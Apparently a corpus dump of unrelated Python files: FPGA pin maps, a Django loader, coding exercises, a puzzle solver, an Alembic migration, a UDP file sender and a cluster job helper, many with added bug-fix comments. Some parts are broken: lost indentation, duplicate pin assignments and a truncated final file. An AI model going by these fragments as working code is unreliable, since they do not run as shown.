GPIO(self, 'IOT_90', 90)
GPIO(self, 'IOT_91', 91)
# 92
GPIO(self, 'IOT_93', 93)
GPIO(self, 'IOT_94', 94)
GPIO(self, 'IOT_95', 95)
GPIO(self, 'IOT_96', 96)
GPIO(self, 'IOT_97', 97)
GPIO(self, 'IOT_99', 99)
GPIO(self, 'IOT_100', 100)
def TQ144(self):
self.package = 'TQ144'
# Special
GPIO(self, "PIOS_00", 70)
GPIO(self, "PIOS_01", 68)
GPIO(self, "PIOS_02", 67)
GPIO(self, "PIOS_03", 71)
# Bank 0
GPIO(self, "PIO0_02", 112)
GPIO(self, "PIO0_03", 113)
GPIO(self, "PIO0_04", 114)
GPIO(self, "PIO0_05", 115)
GPIO(self, "PIO0_06", 116)
GPIO(self, "PIO0_07", 117)
GPIO(self, "PIO0_08", 118)
GPIO(self, "PIO0_09", 119)
# ...
# PIO0_22, 144
# Bank 1
GPIO(self, "PIO1_02", 78)
GPIO(self, "PIO1_03", 79)
GPIO(self, "PIO1_04", 80)
GPIO(self, "PIO1_05", 81)
GPIO(self, "PIO1_06", 87)
GPIO(self, "PIO1_07", 88)
GPIO(self, "PIO1_08", 90)
GPIO(self, "PIO1_09", 91)
GPIO(self, "PIO1_10", 95) # D5
GPIO(self, "PIO1_11", 96) # D4
GPIO(self, "PIO1_12", 97) # D3
GPIO(self, "PIO1_13", 98) # D2
GPIO(self, "PIO1_14", 99) # D1
GPIO(self, "PIO1_15", 101)
GPIO(self, "PIO1_16", 102)
GPIO(self, "PIO1_17", 104)
GPIO(self, "PIO1_18", 105) # IRTXD
GPIO(self, "PIO1_19", 106) # IRRXD
GPIO(self, "PIO1_20", 107) # SD
# Bank 2
GPIO(self, "PIO2_10", 44)
GPIO(self, "PIO2_11", 45)
GPIO(self, "PIO2_12", 47)
GPIO(self, "PIO2_13", 48)
GPIO(self, "PIO2_14", 56)
GPIO(self, "PIO2_15", 60)
GPIO(self, "PIO2_16", 61)
GPIO(self, "PIO2_17", 62)
# Bank 3
GPIO(self, "PIO3_00", 21) # CLK
GPIO(self, "PIO3_01", 20) #
GPIO(self, "PIO3_02", 1) # DCD
GPIO(self, "PIO3_03", 2) # DSR / RESETQ
GPIO(self, "PIO3_04", 3) # DTR
GPIO(self, "PIO3_05", 4) # CTS
GPIO(self, "PIO3_06", 7) # RTS
GPIO(self, "PIO3_07", 8) # TXD
GPIO(self, "PIO3_08", 9) # RXD
# Configuration pins
#set_io CDONE 65
#set_io CRESET_B 66
#GPIO(self, "CDONE", 65)
#GPIO(self, "CRESET", 66)
def CT256(self):
    """Pin map for the CT256 BGA package, expressed as one (name, ball) table.

    Same GPIO names/balls, declared in the same order as the original
    call-per-pin version.

    NOTE(review): several balls appear twice (K15 for PIO1_05 and PIO1_20,
    K14 for PIO1_06 and PIO1_18, G14 for PIO1_07 and PIO1_37, H16 for
    PIO1_09 and PIO1_28) -- verify against the Lattice CT256 pinout table;
    the duplicates are reproduced here unchanged.
    """
    self.package = 'CT256'
    pin_table = [
        # Special
        ("PIOS_00", "P12"), ("PIOS_01", "R12"), ("PIOS_02", "R11"),
        ("PIOS_03", "P11"),
        # Bank 0
        ("PIO0_01", "B15"), ("PIO0_03", "B14"), ("PIO0_07", "A16"),
        ("PIO0_08", "A15"), ("PIO0_09", "B13"), ("PIO0_13", "B12"),
        ("PIO0_14", "B10"), ("PIO0_39", "B5"), ("PIO0_41", "B4"),
        ("PIO0_42", "A2"), ("PIO0_44", "A1"), ("PIO0_45", "C5"),
        ("PIO0_46", "C4"), ("PIO0_47", "B3"), ("PIO0_51", "C3"),
        # ...
        # Bank 1
        ("PIO1_01", "R15"), ("PIO1_03", "P15"), ("PIO1_04", "P16"),
        ("PIO1_05", "K15"), ("PIO1_06", "K14"), ("PIO1_07", "G14"),
        ("PIO1_08", "N16"), ("PIO1_09", "H16"), ("PIO1_12", "M16"),
        ("PIO1_14", "M15"), ("PIO1_16", "L16"), ("PIO1_18", "K14"),
        ("PIO1_19", "J15"), ("PIO1_20", "K15"), ("PIO1_21", "K16"),
        ("PIO1_22", "J14"), ("PIO1_28", "H16"), ("PIO1_29", "H14"),
        ("PIO1_30", "G16"), ("PIO1_32", "G15"), ("PIO1_34", "F16"),
        ("PIO1_36", "F15"), ("PIO1_37", "G14"), ("PIO1_38", "E16"),
        ("PIO1_40", "D16"), ("PIO1_42", "F14"), ("PIO1_44", "D15"),
        ("PIO1_46", "E14"), ("PIO1_47", "C16"), ("PIO1_49", "B16"),
        ("PIO1_51", "D14"),
        # ...
        # Bank 2
        ("PIO2_10", "P1"), ("PIO2_11", "N3"), ("PIO2_12", "M2"),
        ("PIO2_13", "L3"), ("PIO2_14", "K3"), ("PIO2_15", "J2"),
        ("PIO2_16", "H2"), ("PIO2_17", "G2"),
        # ...
        # Bank 3
        # ...
        ("PIO3_26", "J3"),
        # Configuration pins
        ("A16", "A16"),
    ]
    for pin_name, ball in pin_table:
        GPIO(self, pin_name, ball)
class ICE40HX1K(HX):
    """iCE40HX1K device; supports the VQ100 and TQ144 packages."""
    part = 'ice40hx1k'

    def __init__(self, name='hx1k', board=None, package='tq144'):
        assert package in ['vq100', 'tq144']
        super(ICE40HX1K, self).__init__(name, board)
        # Dispatch to the pin-map builder for the requested package;
        # the assert above guarantees the key exists.
        {'tq144': self.TQ144, 'vq100': self.VQ100}[package]()
class ICE40HX8K(HX):
    """iCE40HX8K device; only the CT256 package is supported."""
    part = 'ice40hx8k'

    def __init__(self, name='hx8k', board=None, package='ct256'):
        # Only one package exists, so the assert alone guards the call.
        assert package in ['ct256']
        super(ICE40HX8K, self).__init__(name, board)
        self.CT256()
class LP(Lattice):
    """Lattice iCE40 LP-series device base class.

    Provides a clock, a USART factory, and CSV-driven pin-map loading.
    """
    family = 'ice40'

    def __init__(self, name, board):
        super(LP, self).__init__(name, board)
        self.clock = Clock(self)
        self.USART = USART

    def readpins(self, package):
        """Create a GPIO for every IO pin listed in pins/<package>.csv.

        CSV layout (header row first), e.g. for the iCE40-LP8K-CM81:
            pin,bank,type,name
            C2,3,IO,IOL_2A
        Only rows of type 'IO' become GPIOs; power/config pins are skipped.
        """
        # Renamed from 'dir' (shadowed the builtin); 'with' guarantees the
        # CSV file is closed -- the original leaked the handle.
        pin_dir = os.path.join(os.path.dirname(__file__), 'pins')
        filename = os.path.join(pin_dir, package + '.csv')
        with open(filename, 'r') as f:
            reader = csv.reader(f)
            header = next(reader)  # skip the header row
            for data in reader:
                if data[2] == 'IO':
                    #print(data[3], data[0])
                    GPIO(self, data[3], data[0])

    def CM81(self):
        """Load the pin map for the CM81 package."""
        self.package = 'CM81'
        self.readpins('lp8kcm81')
class ICE40LP1K(LP):
    """iCE40LP1K device; only the CM81 package is supported."""
    part = 'ice40lp1k'

    def __init__(self, name='lp1k', board=None, package='cm81'):
        # Only one package exists, so the assert alone guards the call.
        assert package in ['cm81']
        super(ICE40LP1K, self).__init__(name, board)
        self.CM81()
class ICE40LP8K(LP):
    """iCE40LP8K device; only the CM81 package is supported."""
    part = 'ice40lp8k'

    def __init__(self, name='lp8k', board=None, package='cm81'):
        # Only one package exists, so the assert alone guards the call.
        assert package in ['cm81']
        super(ICE40LP8K, self).__init__(name, board)
        self.CM81()
# iCE40 UltraPlus ("UltraScale+" is a Xilinx family; the UP5K below is Lattice iCE40 UltraPlus)
class UP(Lattice):
    """Lattice iCE40 UltraPlus device base class."""
    family = 'ice40'

    def readpins(self, package):
        """Create a GPIO for every user IO listed in pins/<package>.csv.

        CSV layout (header row first), e.g. for the iCE40-UP5K:
            name,type,bank,pair,UW30,SG48
            IOB_0a,PIO,2,,E5,46
        so column 4 is the UW30 ball and column 5 the SG48 pad.
        A '-' entry marks a signal that is not bonded out on that package.
        """
        pin_dir = os.path.join(os.path.dirname(__file__), 'pins')
        filename = os.path.join(pin_dir, package + '.csv')
        # 'with' guarantees the CSV file is closed (original leaked it).
        with open(filename, 'r') as f:
            reader = csv.reader(f)
            header = next(reader)  # skip the header row
            for data in reader:
                if data[1].startswith('PIO') \
                        or data[1].startswith('DPIO') \
                        or data[1].startswith('LED'):
                    #print(data[1], data[0])
                    if self.package == 'SG48' and data[5] != '-':
                        GPIO(self, data[0], data[5])
                    elif self.package == 'UW30' and data[4] != '-':
                        # BUG FIX: per the header above, the UW30 column is
                        # index 4; the original read data[6], which is past
                        # the end of a 6-column row (IndexError).
                        GPIO(self, data[0], data[4])

    def SG48(self):
        """Load the pin map for the SG48 package."""
        self.package = 'SG48'
        self.readpins('up5k')

    def UW30(self):
        """Load the pin map for the UW30 package."""
        self.package = 'UW30'
        self.readpins('up5k')
class ICE40UP5K(UP):
    """iCE40UP5K device; only the SG48 package is supported here."""
    part = 'ice40up5k'

    def __init__(self, name='up5k', board=None, package='sg48'):
        # Only one package is accepted, so the assert alone guards the call.
        assert package in ['sg48']
        super(ICE40UP5K, self).__init__(name, board)
        self.SG48()
|
import os
import sys
import django

# Stand-alone use of Django's ORM: configure the settings so the project's
# models can be imported and used to load category_data into the database.
pwd = os.path.dirname(os.path.abspath(__file__))
# BUG FIX: the original appended pwd + "../", which yields a path like
# ".../db_tools../" (no separator) and does not exist; append the real
# parent directory so the project package is importable.
sys.path.append(os.path.dirname(pwd))
# Same as manage.py: point Django at the project settings (this provides
# the database configuration needed to save categories).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "FoodMarket.settings")
django.setup()

# These imports must come AFTER django.setup(): before that, the project
# directory is not on sys.path and the settings are not configured.
from db_tools.data.category_data import row_data
from goods.models import GoodsCategory

# Walk the three-level nested category data and persist each level,
# linking children to their parent instance.
for category1 in row_data:
    instance1 = GoodsCategory()
    instance1.name = category1["name"]
    instance1.code = category1["code"]
    instance1.category_type = 1
    instance1.save()
    for category2 in category1["sub_categorys"]:
        instance2 = GoodsCategory()
        instance2.name = category2["name"]
        instance2.code = category2["code"]
        instance2.parent_category = instance1
        instance2.category_type = 2
        instance2.save()
        for category3 in category2["sub_categorys"]:
            instance3 = GoodsCategory()
            instance3.name = category3["name"]
            instance3.code = category3["code"]
            instance3.parent_category = instance2
            instance3.category_type = 3
            instance3.save()
|
# Given a list_of_ints, find the highest_product you can get from three of the integers.
# The input list_of_ints will always have at least three integers.
list_of_ints = [2, -5, -1, -17, -8 , 1, 21, 200]
def highest_product_of_3(input):
    """Return the highest product obtainable from any three integers in
    *input* (the list must contain at least three integers).

    After sorting, the answer is either the product of the three largest
    values, or the product of the two smallest (most negative) values and
    the single largest value.

    BUG FIX: the original greedy scan replaced one selected element at a
    time and missed the two-negatives case -- e.g. for
    [2, -5, -1, -17, -8, 1, 21, 200] it returned 8400 instead of
    (-17) * (-8) * 200 = 27200.  The debug print of the selection was
    removed, and Python 2 print syntax dropped.
    """
    # Parameter kept as 'input' (shadows the builtin) to preserve the
    # public signature for keyword callers.
    nums = sorted(input)
    return max(nums[-1] * nums[-2] * nums[-3],
               nums[0] * nums[1] * nums[-1])
# Python 3 fix: 'print x' statement syntax is a SyntaxError under Python 3.
print(highest_product_of_3(list_of_ints))
# Same as above, but with k integers instead of 3
"""
def highest_product_of_k(input, k):
return product
""" |
# section06 / 01-obj1.py
# 클래스 선언
class Member1:
    """Example class holding member data as class-level attributes.

    Note: these are class attributes, shared by every instance until an
    instance assigns its own value.
    """
    userid = "python"  # login id
    email = "webmaster@soldesk.com"  # contact e-mail address
    phone = "01012345678"  # phone number, digits only
# Create an object (instance) of Member1
mem1 = Member1()
print(mem1.userid)
print(mem1.email)
print(mem1.phone)
# Create a second object -- both print the same shared class attributes
mem2 = Member1()
print(mem2.userid)
print(mem2.email)
print(mem2.phone)
print()
# Define a class that contains functions (methods)
# Every function in a class must declare 'self' as its first parameter
class Calc:
    """Tiny calculator demonstrating methods and multi-value returns."""

    def plus(self, x, y):
        """Return the sum x + y."""
        total = x + y
        return total

    def minus(self, x, y):
        """Return the difference x - y."""
        difference = x - y
        return difference

    def all(self, x, y):
        """Return (x + y, x - y) as a single tuple."""
        return (self.plus(x, y), self.minus(x, y))
cal = Calc()
print(cal.plus(5, 3))
print(cal.minus(5, 3))
# all() returns a tuple; it can be kept whole ...
a = cal.all(10, 20)
print(a)
# ... or unpacked into separate variables
p, m = cal.all(100, 200)
print(p, m)
print()
# Define a class containing both variables (attributes) and functions (methods)
class Member:
    """Example member record with a join/display API."""
    username = ""
    email = ""

    def join(self, username, email):
        """Store the supplied credentials on this instance."""
        self.username = username
        self.email = email

    def view_info(self):
        """Print the stored username and e-mail, one per line."""
        for value in (self.username, self.email):
            print(value)
# Create a member, register its data, and display it
mem1 = Member()
mem1.join("python", "webmaster@soldesk.com")
mem1.view_info()
|
#!/usr/bin/env python
"""Run nosetests in the diesel event loop.
You can pass the same command-line arguments that you can pass to the
`nosetests` command to this script and it will execute the tests in the
diesel event loop. This is a great way to test interactions between various
diesel green threads and network-based applications built with diesel.
"""
import diesel
import nose
from diesel.logmod import LOGLVL_ERR, Logger
class QuietApplication(diesel.Application):
    """A diesel Application with reduced log output.

    Keeps diesel from spewing its own status to stdout and lets nose
    run the show.
    """

    def __init__(self):
        # Only log at error level and above.
        super(QuietApplication, self).__init__(
            logger=Logger(verbosity=LOGLVL_ERR))
def main():
    """Run nose's main() inside a quiet diesel event loop."""
    application = QuietApplication()
    application.add_loop(diesel.Loop(nose.main))
    application.run()
if __name__ == '__main__':
main()
|
"""Removes unused functions."""
def reachable(func, reachable_funcs, id_to_func):
    """Mark func, and every function transitively called from it, reachable.

    Iterative worklist version of the original recursion; it adds the same
    functions to reachable_funcs.
    """
    worklist = [func]
    while worklist:
        current = worklist.pop()
        if current in reachable_funcs:
            continue
        reachable_funcs.add(current)
        for inst in current.instructions():
            if inst.op_name == 'OpFunctionCall':
                callee = id_to_func[inst.operands[0]]
                if callee not in reachable_funcs:
                    worklist.append(callee)
def run(module):
    """Remove every function not reachable from any entry point."""
    id_to_func = {f.inst.result_id: f for f in module.functions}
    live = set()
    # operands[1] of an OpEntryPoint is the entry function's result id.
    for entry_inst in module.global_instructions.op_entry_point_insts:
        reachable(id_to_func[entry_inst.operands[1]], live, id_to_func)
    # Collect first, then destroy, since destroy() mutates module.functions.
    dead = [f for f in module.functions if f not in live]
    for f in dead:
        f.destroy()
|
# coding:utf-8
__author__ = 'cwang14'
from queue import PriorityQueue
from typing import List
class Solution:
    """Solve the 2x3 sliding puzzle (target state '123450') with a
    best-first search guided by a Manhattan-distance heuristic."""

    def Manhattan(self, s1, s2):
        """Heuristic: sum, over every tile, of the Manhattan distance
        between its position in s1 and its position in s2.

        BUG FIX: the column term used '+' instead of '-'
        (abs(i1 % 3 + i2 % 3)), which is not a distance at all -- it was
        nonzero even for two identical states.
        """
        dist = 0
        for i1, d in enumerate(s1):
            i2 = s2.index(d)
            dist += abs(i1 // 3 - i2 // 3) + abs(i1 % 3 - i2 % 3)
        return dist

    def slidingPuzzle(self, board: List[List[int]]) -> int:
        """Return the number of moves to reach '123450', or -1 if the
        board is unsolvable."""
        # Neighbours of each flat index on the 2x3 grid:
        # [0,1,2]
        # [3,4,5]
        v_map = [(1, 3), (0, 2, 4), (1, 5), (0, 4), (3, 1, 5), (2, 4)]
        start = ''.join(str(e) for row in board for e in row)
        frontier = PriorityQueue()
        frontier.put((0, (start, 0)))
        # Visited states: a set gives O(1) membership (the original list
        # was O(n) per lookup).
        used = {start}
        while not frontier.empty():
            _, (state, moves) = frontier.get()
            if state == '123450':
                return moves
            zero_index = state.index('0')
            for index in v_map[zero_index]:
                cells = list(state)
                cells[zero_index], cells[index] = cells[index], cells[zero_index]
                nxt = ''.join(cells)
                if nxt not in used:
                    # Priority = moves made so far + heuristic estimate.
                    priority = self.Manhattan(nxt, '123450')
                    frontier.put((moves + 1 + priority, (nxt, moves + 1)))
                    used.add(nxt)
        return -1
|
class Animal(object):
    """Base animal with a name and a health pool.

    walk() and run() reduce health and return self so calls can be chained.

    Python 3 fix: converted 'print x' statements (SyntaxError under
    Python 3) into print() calls.
    """

    def __init__(self, name, health):
        self.name = name
        self.health = health
        print(self.name)

    def walk(self):
        """Walking costs 1 health; returns self for chaining."""
        self.health -= 1
        return self

    def run(self):
        """Running costs 5 health; returns self for chaining."""
        self.health -= 5
        return self

    def display_health(self):
        """Print the current health."""
        print(self.health)
class Dog(Animal):
    """An Animal that starts with 150 health and can be petted."""

    def __init__(self, name):
        super(Dog, self).__init__(name, 150)

    def pet(self):
        """Petting restores 5 health; returns self for chaining."""
        self.health += 5
        return self
class Dragon(Animal):
    """An Animal that starts with 170 health and can fly.

    Python 3 fix: converted 'print x' statements (SyntaxError under
    Python 3) into print() calls.
    """

    def __init__(self, name):
        super(Dragon, self).__init__(name, 170)

    def fly(self):
        """Flying costs 10 health; returns self for chaining."""
        self.health -= 10
        return self

    def display_health(self):
        """Print health, then identify the animal as a Dragon."""
        print(self.health)
        print("I am a Dragon")
print("\n")
dragon1 = Dragon("Droch")
dragon1.fly().fly().fly().display_health()
print("\n")
animal1 = Animal("Zeb", 100)
animal1.walk().walk().walk().run().run().display_health()
print("\n")
dog1 = Dog("Gibbs")
dog1.walk().walk().walk().run().run().pet().display_health() |
import sys
import os

import gitmer

repos_lst_file = sys.argv[1]
mappingscache_xml_file = sys.argv[2]

# Read the repository list, one path per line.
# BUG FIX: the original did x.strip('\r') then x.strip('\n'), which leaves
# a trailing '\r' on CRLF lines (the '\r' is not at the string's end until
# the '\n' is removed); stripping both characters at once handles CRLF.
repos = []
with open(repos_lst_file, "r") as f:
    for line in f:
        repos.append(line.strip("\r\n"))

# Reuse the existing mappings cache when present.
if os.path.isfile(mappingscache_xml_file):
    mappings = gitmer.generate_mappings(repos, mappingscache_xml_file)
else:
    mappings = gitmer.generate_mappings(repos)

# Rewrite the cache ('w' truncates; the original's 'w+' read mode was unused).
with open(mappingscache_xml_file, "w") as f:
    f.write(mappings)
|
import pandas as pd

colnames = ["SectorStatID", "SectorStatName", "PersID", "Age", "GenderID",
            "GenderName", "HouseholdID", "HouseholdTypeID",
            "HouseholdTypeName", "WorkerID", "WorkerType",
            "WorkSectorStatID", "WorkSectorStatName"]
student = pd.DataFrame(columns=colnames)

unif_fr = pd.read_csv('unif_fr_hors_bxl_to_bxl_v2.csv', sep=";")
#unif_fr.set_index("Libellé commune de l'implantation", inplace = True, drop = True)
print(unif_fr)

closest_peri = pd.read_csv('closest_ss_peri_v2.csv')
closest_peri.set_index("SectorStatID", inplace=True, drop=True)
print(closest_peri)

ss_names = pd.read_csv('sector_stat.csv', sep=";")
ss_names.set_index("Code", inplace=True, drop=True)
print(ss_names)

# Students from outside Brussels (FR) -> Brussels campuses: map each commune
# to its list of statistical sectors.
ss = pd.read_csv('campus_fr_ss_commune.csv')
ss.drop(columns=["Unnamed: 0"], inplace=True)
#ss.set_index("SectorStat", inplace=True, drop=True)
print(ss)

communes = ss.Commune
dic = dict()
for com in communes:
    dic[com] = ss[ss.Commune == com].SectorStat.tolist()
print(dic)

i = 0
for ind in unif_fr.index:
    print("ind", ind)
    # BUG FIX: the original evaluated the bare names 'errorsex' /
    # 'errorSexName' to signal bad data (crashing with a NameError);
    # raise an explicit error instead.
    sexe = unif_fr.loc[ind, "Sexe"]
    if sexe == "Femme":
        sex = 1
        gender_name = 'female'
    elif sexe == "Homme":
        sex = 0
        gender_name = 'male'
    else:
        raise ValueError("Unexpected value in 'Sexe' column: %r" % sexe)

    age = unif_fr.loc[ind, "Age"]
    nb = unif_fr.loc[ind, "Sum of Compte"]
    com_to = unif_fr.loc[ind, "Commune"]
    list_ss_to = dic[com_to]
    # BUG FIX: floor division instead of round(); with round(), e.g.
    # nb=3 over 2 sectors gave 2 + 2 + remainder 1 = 5 students total.
    # floor + remainder-to-first-sector always sums to exactly nb.
    nb_per_ss = nb // len(list_ss_to)
    reste = nb % len(list_ss_to)
    first_ss = True
    # Loop variable renamed from 'ss' (it shadowed the DataFrame above).
    for ss_to in list_ss_to:
        print("ss", ss_to)
        ss_from_id = closest_peri.loc[ss_to]
        if type(ss_from_id) != str:
            ss_from_id = ss_from_id[0]
        ss_from_name = ss_names.loc[ss_from_id, "Name"]
        ss_to_name = ss_names.loc[ss_to, "Name"]
        if first_ss:
            nb_per_ss_tmp = nb_per_ss + reste
            first_ss = False
        else:
            nb_per_ss_tmp = nb_per_ss
        while nb_per_ss_tmp > 0:
            print("i", i)
            student.loc[i] = [ss_from_id, ss_from_name, i,
                              "Useless for non resident but " + str(age),
                              "Useless for non resident but " + str(gender_name),
                              "Useless for non resident",
                              "Useless for non resident",
                              "Useless for non resident",
                              "Useless for non resident",
                              5, "Unif off campus", ss_to, ss_to_name]
            nb_per_ss_tmp -= 1
            i += 1

print(student)
student.to_csv("foreign_student_workplace.csv")
"""empty message
Revision ID: 5c5792caf593
Revises: 13a3da0db2d2
Create Date: 2016-03-12 16:14:17.557226
"""
# revision identifiers, used by Alembic.
revision = '5c5792caf593'
down_revision = '13a3da0db2d2'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply this revision: create the admin_fee and
    admin_fee_transaction_item tables and link log rows to fees."""
    ### commands auto generated by Alembic - please adjust! ###
    op.create_table('admin_fee',
        sa.Column('object_id', sa.Integer(), nullable=False),
        sa.Column('amount', sa.Integer(), nullable=False),
        sa.Column('reason', sa.UnicodeText(), nullable=False),
        sa.Column('paid', sa.Boolean(), nullable=False),
        # Both FKs reference user.object_id: who was charged, who charged.
        sa.Column('charged_to_id', sa.Integer(), nullable=False),
        sa.Column('charged_by_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['charged_by_id'], [u'user.object_id'], ),
        sa.ForeignKeyConstraint(['charged_to_id'], [u'user.object_id'], ),
        sa.PrimaryKeyConstraint('object_id')
    )
    op.create_table('admin_fee_transaction_item',
        sa.Column('object_id', sa.Integer(), nullable=False),
        sa.Column('is_refund', sa.Boolean(), nullable=False),
        sa.Column('admin_fee_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['admin_fee_id'], [u'admin_fee.object_id'], ),
        # Primary key doubles as FK to transaction_item.object_id --
        # presumably joined-table inheritance; confirm against the models.
        sa.ForeignKeyConstraint(['object_id'], [u'transaction_item.object_id'], ),
        sa.PrimaryKeyConstraint('object_id')
    )
    op.add_column(u'log', sa.Column('admin_fee_id', sa.Integer(), nullable=True))
    # NOTE(review): name=None leaves the FK constraint name to the backend;
    # see the matching drop_constraint(None, ...) caveat in downgrade().
    op.create_foreign_key(None, 'log', 'admin_fee', ['admin_fee_id'], ['object_id'])
    ### end Alembic commands ###
def downgrade():
    """Revert this revision: drop the admin_fee tables and the log link
    column."""
    ### commands auto generated by Alembic - please adjust! ###
    # NOTE(review): drop_constraint(None, ...) needs an actual constraint
    # name on most backends; Alembic autogenerate emitted None here --
    # confirm this works on the target database before relying on it.
    op.drop_constraint(None, 'log', type_='foreignkey')
    op.drop_column(u'log', 'admin_fee_id')
    op.drop_table('admin_fee_transaction_item')
    op.drop_table('admin_fee')
    ### end Alembic commands ###
|
import os
import sys
import socket
import select
import time

# Command-line arguments: remote host/port, the troll (lossy relay) port,
# and the file to transfer.
gammaIP = str(sys.argv[1])
gammaPort = int(sys.argv[2])
trollPort = int(sys.argv[3])
fileName = str(sys.argv[4])

# Constants
timeout = 1.5          # seconds to wait for an ACK before retransmitting
HOST = ''
PORT = 4001
header = b''
flag = 1               # segment type: 1=size, 2=filename, 3=file data
sequenceNumber = 0     # alternating-bit sequence number
CHUNK_SIZE = 1000

# Set up the client socket on localhost with port 4001.
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientSocket.bind((HOST, PORT))

# Placeholders for the unused select() parameter lists
# (see https://docs.python.org/2/library/select.html).
wlist = []
xlist = []

# File size, sent in the first segment.
size = os.stat(fileName).st_size

# Header: remote IP (4 bytes) + remote port (2 bytes) prefixes every segment.
for octet in gammaIP.split('.'):
    header = header + int(octet).to_bytes(1, 'big')
header = header + gammaPort.to_bytes(2, 'big')


def send_reliably(segment, label):
    """Stop-and-wait send: transmit 'segment' and retransmit until the
    ACK carrying the current sequence number arrives, then toggle the
    sequence number.

    BUG FIX: the original indexed readList[0] without checking whether
    select() timed out.  On a timeout select() returns three EMPTY lists,
    so a lost datagram raised IndexError instead of being retransmitted;
    the timeout parameter was effectively dead code.
    """
    global sequenceNumber
    clientSocket.sendto(segment, (gammaIP, trollPort))
    while 1:
        readList, writeList, errorList = select.select(
            [clientSocket], wlist, xlist, timeout)
        if not readList:
            # Timed out waiting for the ACK -- retransmit.
            print('Resending %s segment...' % label)
            clientSocket.sendto(segment, (gammaIP, trollPort))
            continue
        ack = int.from_bytes(readList[0].recv(1), 'big')
        if ack != sequenceNumber:
            # Wrong sequence number -- retransmit.
            print('Resending %s segment...' % label)
            clientSocket.sendto(segment, (gammaIP, trollPort))
        else:
            break
    sequenceNumber = 0 if sequenceNumber == 1 else 1


# Segment 1: file size.
print('Sending first segment...')
data = (header + flag.to_bytes(1, 'big') + sequenceNumber.to_bytes(1, 'big')
        + size.to_bytes(4, 'big'))
send_reliably(data, 'first')
print('Segment 1 acknowledged!')
flag = 2

# Segment 2: file name.
print('Sending second segment...')
data = (header + flag.to_bytes(1, 'big') + sequenceNumber.to_bytes(1, 'big')
        + fileName.encode('utf-8'))
send_reliably(data, 'second')
print('Segment 2 acknowledged!')
flag = 3

# Segment 3..n: file contents in CHUNK_SIZE pieces.
print('Sending file...')
with open(fileName, 'rb') as file:
    while 1:
        chunk = file.read(CHUNK_SIZE)
        if not chunk:
            break
        data = (header + flag.to_bytes(1, 'big')
                + sequenceNumber.to_bytes(1, 'big') + chunk)
        send_reliably(data, 'third')
        print('Segment 3 acknowledged!')

clientSocket.close()
print('File transfer completed')
|
#!/usr/bin/env python
'''
this module will submit a job to the queue when a calculation is called.
Use this in a script like this:
from ase import *
from Jacapo import *
from htp.queue_qn import *
Jacapo.qsuboptions = '-l cput=23:00:00,mem=499mb -joe -p -1024'
Jacapo.calculation_required = calculation_required
Jacapo.calculate = queue_qn
Jacapo.qnrelax_tags = [0,1,2]
author:: John Kitchin <jkitchin@andrew.cmu.edu>
'''
import exceptions
import commands, os, string, sys, time
from torque.torque import *
from ase import *
from ase.calculators.jacapo import *
from Scientific.IO.NetCDF import NetCDFFile
class DacapoAborted(exceptions.Exception):
    """Raised when the Dacapo text output contains an 'abort_calc' line."""

    def __init__(self, args=None):
        self.args = args

    def __str__(self):
        # Equivalent to string.join(self.args, '') without the string module.
        return ''.join(self.args)
class DacapoNotFinished(exceptions.Exception):
    """Raised when the Dacapo text output lacks a clean-exit final line."""

    def __init__(self, args=None):
        self.args = args

    def __str__(self):
        # Equivalent to string.join(self.args, '') without the string module.
        return ''.join(self.args)
def calculation_required(self, atoms=None, quantities=None):
    """Replacement for Jacapo.calculation_required.

    Always reports True so that calculate() (replaced by queue_qn) is
    invoked on every call; queue_qn itself decides whether work is needed.
    """
    #we need to overwrite this method so calculate always gets called
    return True
def queue_qn(self,*args,**kwargs):
    '''
    this will replace the calculate method of the Jacapo Calculator
    and run a job through the queue.

    Control flow (communicates progress by raising exceptions):
      1. finished  -> clean up scratch files, return True
      2. job in queue -> raise JobRunning / JobInQueue / JobDone
      3. job gone but output bad -> raise a PBS_* / Dacapo* exception
      4. no job yet -> write a job script, qsub it, raise JobSubmitted
    Note: this is Python 2 code (old raise syntax, octal literal, print
    statements).
    '''
    CWD = os.getcwd()
    # Derive every scratch/bookkeeping filename from the .nc file path,
    # then chdir into its directory so bare filenames work.
    wholencfile = self.get_nc()
    basepath,NCFILE = os.path.split(wholencfile)
    basename,ext = os.path.splitext(NCFILE)
    TXTFILE = basename + '.txt'
    runningfile = NCFILE + '.running'
    stopfile = NCFILE + '.stop'
    JOBFILE = basename + '.job_sh'
    JOBIDFILE = basename + '.jobid'
    if basepath is not '':
        #print 'changing to %s' % basepath
        os.chdir(basepath)
    #print os.getcwd(), NCFILE
    # Re-read the calculator state from disk; 'self' is rebound to the
    # calculator stored in the nc file.
    atoms = Jacapo.read_atoms(NCFILE)
    self = atoms.get_calculator()
    #print self
    if self.get_status() == 'finished':
        #this means the job is done.
        #do some clean-up of unimportant files
        for jfile in [JOBFILE,
                      JOBIDFILE,
                      runningfile,
                      stopfile]:
            if os.path.exists(jfile): os.remove(jfile)
        #slave files from parallel runs
        import glob
        slvpattern = TXTFILE + '.slave*'
        for slvf in glob.glob(slvpattern):
            os.unlink(slvf)
        #exit so that we can move on.
        os.chdir(CWD)
        return True
    #Past here means we have to check if the calculation is running
    if os.path.exists(JOBIDFILE):
        JOBID = open(JOBIDFILE).readline()
    else:
        JOBID = None
    # get a queue object
    pbs = PBS()
    pbs.fastpoll()
    if JOBID is not None:
        jobnumber,beowulf = JOBID.split('.')
        #the job has been submitted before, and we need
        #to find out what the status of the jobid is
        for job in pbs:
            if job['Job Id'] == JOBID:
                if job['job_state'] == 'R':
                    os.chdir(CWD)
                    raise JobRunning, job['job_state']
                elif job['job_state'] == 'Q':
                    os.chdir(CWD)
                    raise JobInQueue, job['job_state']
                elif job['job_state'] == 'C':
                    #this means the queue thinks the job is done
                    #but has not purged it yet. we should pass
                    #usually you should not get here if the job
                    #is actually finished because teh function
                    #would exit above.
                    # NOTE(review): unlike the other branches this one
                    # does not os.chdir(CWD) before raising -- confirm
                    # whether that is intentional.
                    raise JobDone, job['job_state']
                else:
                    os.chdir(CWD)
                    raise UnknownJobStatus, job['job_state']
        # if you get here, the job is not in the queue anymore
        # getting here means the job was not finished, and is not in
        # the queue anymore, or that the queue has not flushed it yet.
        OUTPUTFILE = JOBFILE + '.o' + jobnumber
        #lets see if there is anything in the output file
        # NOTE(review): this handle (and the one below) is opened without
        # a matching close on the raising paths.
        f = open(OUTPUTFILE)
        for line in f:
